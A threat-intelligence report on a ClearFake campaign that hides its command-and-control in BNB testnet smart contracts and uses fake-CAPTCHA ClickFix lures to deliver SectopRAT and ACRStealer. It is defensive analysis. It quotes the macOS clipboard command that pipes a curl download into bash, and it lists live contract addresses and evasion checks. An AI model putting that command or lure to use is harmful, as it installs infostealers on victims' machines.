# ClearFake EtherHiding on BNB Smart Chain Testnet — Smart Contract C2 Delivering SectopRAT + ACRStealer via ClickFix Fake-CAPTCHA

> Trend Micro analyzed a real intrusion in which threat actors abused the EtherHiding technique on the BNB Smart Chain testnet to host immutable, takedown-resistant command-and-control logic and payloads. Four Solidity smart contracts sharing one deployer wallet act as a Stage 1 dispatcher, OS-specific (Windows and macOS) ClickFix overlay payloads, and an on-chain execution tracker, routing ClearFake-injected JavaScript from a compromised Swiss WordPress site through fake Google reCAPTCHA / ClickFix social engineering to deliver SectopRAT (.NET browser-session hijacker) and ACRStealer (C++ infostealer). Oldest contract deployed 26 May 2025 — confirming a ~1-year actively maintained campaign — with addtoList() victim-IP entries proving live exploitation at the time of publication.

- **Published:** 2026-05-26T00:00:00Z
- **Last reviewed:** 2026-08-26T01:25:52.451Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-0592
- **ID:** TL-2026-0592
- **Severity:** HIGH
- **Category:** MALWARE
- **Status:** ACTIVE
- **Actor:** UNC5142
- **Detections:** 9 · **IOCs:** 39 (full data via the Threadlinqs MCP server — Purple tier)

## Description

Smart Contracts for C&C — How ClearFake Hid in Plain Sight on BSC Testnet (Trend Micro / TrendAI Research, Ryan Soliven, 26 May 2026) documents an MDR-derived intrusion that elevates the EtherHiding technique from proof-of-concept to operational, blockchain-native command-and-control. Rather than hosting payloads or routing logic on traditional web infrastructure, the operators write base64-encoded JavaScript payloads directly into the on-chain storage of Solidity smart contracts deployed to the BNB Smart Chain (BSC) testnet. Because BSC is an Ethereum-compatible network whose contract storage is replicated across every node and is, by design, immutable, the payloads cannot be sinkholed, suspended, or seized by registrars, hosting providers, or law enforcement. Operation on the testnet (not mainnet) is deliberate: test BNB has no monetary value and is freely available from public faucets, giving the threat actor a zero-cost, takedown-resistant routing layer.

The campaign uses four smart contracts, all deployed by a single wallet (0xd71f4cdC84420d2bd07F50787B4F998b4c2d5290) and all implementing the same minimal key-value-store Solidity pattern. The contracts expose a publicly readable get() function (selector 0x6d4ce63c) which a victim browser reads via standard JSON-RPC eth_call to the public BSC testnet RPC endpoint bsc-testnet-rpc.publicnode.com, an owner-restricted set() function (selector 0x4ed3885e) used by the operator to update payloads with a single transaction, and an owner() function returning the deployer wallet. Smart Contract A (0xA1decFB75C8C0CA28C10517ce56B710baf727d2e, deployed 26 May 2025) is the Stage 1 entry-point dispatcher whose address is embedded in the obfuscated JavaScript injected into compromised websites. Smart Contract B (0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff, deployed 24 Sep 2025) stores the Windows-specific ~43 KB Stage 3 ClickFix overlay payload. Smart Contract C (0x68DcE15C1002a2689E19D33A3aE509DD1fEb11A5, deployed 30 Sep 2025) stores the macOS-specific Stage 3 payload. Smart Contract D (0xf4a32588b50a59a82fbA148d436081A48d80832A, deployed 18 Jun 2025) is the on-chain execution tracker: the read-side isGoalReached(uuid) suppresses the overlay for already-compromised victims to limit researcher exposure, while the write-side addtoList(string) records the victim's public IP — ABI-decoded transactions captured by Trend Micro on BscScan confirm live victim execution events.

Initial access in the analyzed case was a watering-hole compromise of a legitimate Swiss WordPress recreational activity website. At line 146 of the page <head>, a single rogue tag of the form <script src="data:text/javascript;base64,…"> was injected alongside 22 legitimate WordPress and plugin scripts. The inline data: URI carries the ClearFake Stage 1 loader as base64 inline content, defeating URL-based blocking because no external domain is referenced in the static page source. Decoded, Stage 1 is an obfuscated JavaScript file using a string-array rotation pattern: a function _0x4e2e() exposes all plaintext strings as an indexed array, and a self-invoking IIFE shuffles the array at runtime until an integer checksum validates. After deobfuscation, the script's async load_() function manually constructs an eth_call JSON-RPC request to the BSC testnet RPC, decodes the EVM ABI-encoded string response (32-byte offset, 32-byte length, raw string bytes) in custom JavaScript to avoid any Web3 library dependency, base64-decodes the returned string from Smart Contract A, and eval-executes Stage 2 in the browser. A .catch(() => {}) silent error handler ensures the failure mode is fully invisible to the victim.

Stage 2 is the anti-analysis and OS routing layer. The isHeadless() function tests seven conditions: navigator.webdriver, /HeadlessChrome/ in user agent, PhantomJS / Puppeteer / Playwright user-agent strings, window.outerWidth === 0 && window.outerHeight === 0, and the absence of all of window.chrome, window.safari, and Firefox in the user agent. The isLocalhost() function does not see the endpoint's internal RFC1918 address — instead it issues an XHR to ip-info.ff.avast.com/v2/info to fetch the public egress IP, then blocks 192.168.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and localhost variants, filtering out cloud sandboxes and researcher VPNs. Victims that pass both checks are fingerprinted by navigator.userAgent and navigator.userAgentData.platform and routed to Smart Contract B (Windows) or Smart Contract C (macOS); if either check fails, the script writes 'stop watching us :)' to console and exits silently.

Stage 3 (Windows) renders a high-fidelity fake Google reCAPTCHA overlay containing the genuine Google logo SVG, the 'I'm not a robot' checkbox, and Privacy/Terms links. Clicking the checkbox both displays the ClickFix social-engineering instructions and synchronously calls navigator.clipboard.writeText() to plant a Run-dialog command in the victim clipboard. Before rendering, the script also calls getUserID() — a synchronous XMLHttpRequest to ip-info.ff.avast.com that captures the victim's real public IP and persists it as a UUID in the cookie cjs_id with a 2-day TTL — so that the threat actor can correlate browser-side conversions with the on-chain addtoList() entries on Smart Contract D. Execution telemetry confirmed the victim opened the Run dialog and executed the clipboard command, causing the Windows WebClient service to load put34b.camp — a remote DLL with a non-standard .camp extension served over WebDAV — directly into memory via rundll32.exe with a UNC-path argument. No file-creation event for put34b.camp was recorded; the DLL is purely in-memory. rundll32.exe then performed two PROCESS_CREATE_REMOTETHREAD operations injecting threads into chrome.exe and msedge.exe; the injected code (later associated with _remote_debugging.pyd) performs browser credential, cookie, password, and session theft.

Stage 4 (Windows) drops a complete Python 3.15 embeddable runtime (38 files including pythonw.exe and helper.py) into C:\Users\[User]\AppData\Local\FileZilla\Data\DC80D99D\, a path masquerading as the FileZilla FTP client. A process-creation event records pythonw.exe helper.py launching, and Trend Micro identifies this Python-based loader as matching the ACRStealer profile previously documented by Vega Security on a related ClearFake contract cluster (February 2026). Concurrently, a DLL sideloading triad is staged in C:\Users\[User]\AppData\Local\Mozilla\Firefox\361e6e66.default\ consisting of a legitimate vlc.exe and libvlc.dll alongside a malicious libvlccore.dll — a proxy DLL that forwards real VLC API calls while decrypting and executing a 4.29 MB ACRStealer payload embedded in its .reloc section. SectopRAT is the .NET RAT that performs the actual browser-session hijack: it spawns an invisible secondary desktop, drives Chrome and Edge in that hidden desktop, and exfiltrates browser passwords, credit cards, cookies, cryptocurrency wallet extension data, Discord and Telegram sessions, Steam, VPN, and FTP credentials, with download2324.mediafire.com observed as a fallback C2 if primary infrastructure is unavailable.

The macOS variant routed via Smart Contract C reuses the same isHeadless()/isLocalhost()/Avast-IP/cjs_id/Smart Contract D conversion-tracking scaffolding but swaps the ClickFix instructions for 'Open Terminal (Applications > Utilities > Terminal); press Command+V; press Enter'. The clipboard payload is /bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL '[URL]')", spoofing macOS Catalina 10.15.7 in the user agent to fetch the macOS-specific variant; the download URL is built dynamically inside obfuscated Stage 3 JavaScript and was not recovered as plaintext. The macOS path adds a secondary victim-tracking channel — a Yandex Metrika analytics tracker (counter ID 99162160, mc.yandex.ru/metrika/tag.js) injected via a nested eval(atob(<base64>)) — giving the operator click-map, link-tracking, and bounce-rate telemetry through a fully legitimate analytics service alongside the on-chain conversion tracker. Forensic confirmation that both OS payloads share authorship comes from identical overlay layout, reCAPTCHA assets, and the shared deployer wallet and Smart Contract D conversion tracker.

Trend Micro does not attribute this specific campaign. The article notes that Google's October 2025 research reported DPRK-aligned cluster UNC5342 has adopted EtherHiding generally, demonstrating the technique's spread to nation-state capability, but the ClearFake/SectopRAT/ACRStealer cluster analyzed here is unattributed. All four smart contracts were live on the BSC testnet at publication and remain immutable; takedown is impossible by design. Operational defensive guidance from Trend Micro emphasizes blocking outbound JSON-RPC traffic to bsc-testnet-rpc.publicnode.com (and other BSC testnet RPC endpoints) from non-developer fleets, disabling the Windows WebClient service where WebDAV is not required, behavioral detection on rundll32.exe with UNC-path arguments, restricting clipboard write access in enterprise browser policy, alerting on eth_call patterns in web-proxy logs as an early-warning EtherHiding indicator, and end-user awareness training against fake-CAPTCHA / ClickFix lures, since the entire post-infection chain hinges on a single deliberate Run-dialog or Terminal paste-and-execute action by the victim.

## MITRE ATT&CK

- T1189 Drive-by Compromise
- T1583.006 Acquire Infrastructure: Web Services
- T1584.004 Compromise Infrastructure: Server
- T1608.001 Stage Capabilities: Upload Malware
- T1204.004 User Execution: Malicious Copy and Paste
- T1059.007 Command and Scripting Interpreter: JavaScript
- T1059.004 Command and Scripting Interpreter: Unix Shell
- T1059.006 Command and Scripting Interpreter: Python
- T1218.011 System Binary Proxy Execution: Rundll32
- T1574.001 DLL
- T1055.003 Thread Execution Hijacking
- T1027 Obfuscated Files or Information
- T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
- T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks
- T1497.001 Virtualization/Sandbox Evasion: System Checks
- T1036.005 Match Legitimate Resource Name or Location
- T1620 Reflective Code Loading
- T1082 System Information Discovery
- T1518.001 Software Discovery: Security Software Discovery
- T1016 System Network Configuration Discovery
- T1016.001 System Network Configuration Discovery: Internet Connection Discovery
- T1555.003 Credentials from Password Stores: Credentials from Web Browsers
- T1539 Steal Web Session Cookie
- T1005 Data from Local System
- T1115 Clipboard Data
- T1102.002 Bidirectional Communication
- T1071.001 Web Protocols
- T1105 Ingress Tool Transfer
- T1008 Fallback Channels
- T1573 Encrypted Channel
- T1041 Exfiltration Over C2 Channel
- T1567 Exfiltration Over Web Service
- T1608.004 Stage Capabilities: Drive-by Target
- T1574.002 Hijack Execution Flow: DLL Side-Loading
- T1140 Deobfuscate/Decode Files or Information

## Sources

- [Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet](https://www.trendmicro.com/en_us/research/26/e/smart-contracts-for-command-and-control.html)
- [EtherHiding: Hiding Malicious Code in Blockchain Smart Contracts (Guardz, original disclosure)](https://guardz.com/blog/etherhiding-malware-on-blockchain/)
- [Google TAG / Mandiant: UNC5342 Adopts EtherHiding (DPRK)](https://cloud.google.com/blog/topics/threat-intelligence/contagious-interview-etherhiding)
- [Red Canary Intelligence Insights — ClearFake #1 (May 2026)](https://redcanary.com/threat-detection-report/)
- [Vega Security — ClearFake ACRStealer Python Loader Analysis](https://vegasec.io/research/clearfake-acrstealer-python-loader)
- [BscScan — Smart Contract A (Stage 1 dispatcher)](https://testnet.bscscan.com/address/0xA1decFB75C8C0CA28C10517ce56B710baf727d2e)
- [BscScan — Smart Contract B (Windows ClickFix overlay)](https://testnet.bscscan.com/address/0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff)
- [BscScan — Smart Contract C (macOS payload)](https://testnet.bscscan.com/address/0x68DcE15C1002a2689E19D33A3aE509DD1fEb11A5)
- [BscScan — Smart Contract D (execution tracker)](https://testnet.bscscan.com/address/0xf4a32588b50a59a82fbA148d436081A48d80832A)
- [BscScan — Deployer Wallet](https://testnet.bscscan.com/address/0xd71f4cdC84420d2bd07F50787B4F998b4c2d5290)
- [MITRE ATT&CK — Drive-by Compromise (T1189)](https://attack.mitre.org/techniques/T1189/)
- [MITRE ATT&CK — User Execution: Malicious Copy and Paste (T1204.004) / ClickFix](https://attack.mitre.org/techniques/T1204/004/)
- [MITRE ATT&CK — Hijack Execution Flow: DLL Side-Loading (T1574.002)](https://attack.mitre.org/techniques/T1574/002/)
- [MITRE ATT&CK — Web Service: Bidirectional Communication (T1102.002)](https://attack.mitre.org/techniques/T1102/002/)
- [Microsoft — Disable WebClient (WebDAV) Service Guidance](https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/disable-webdav-publishing)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-0592
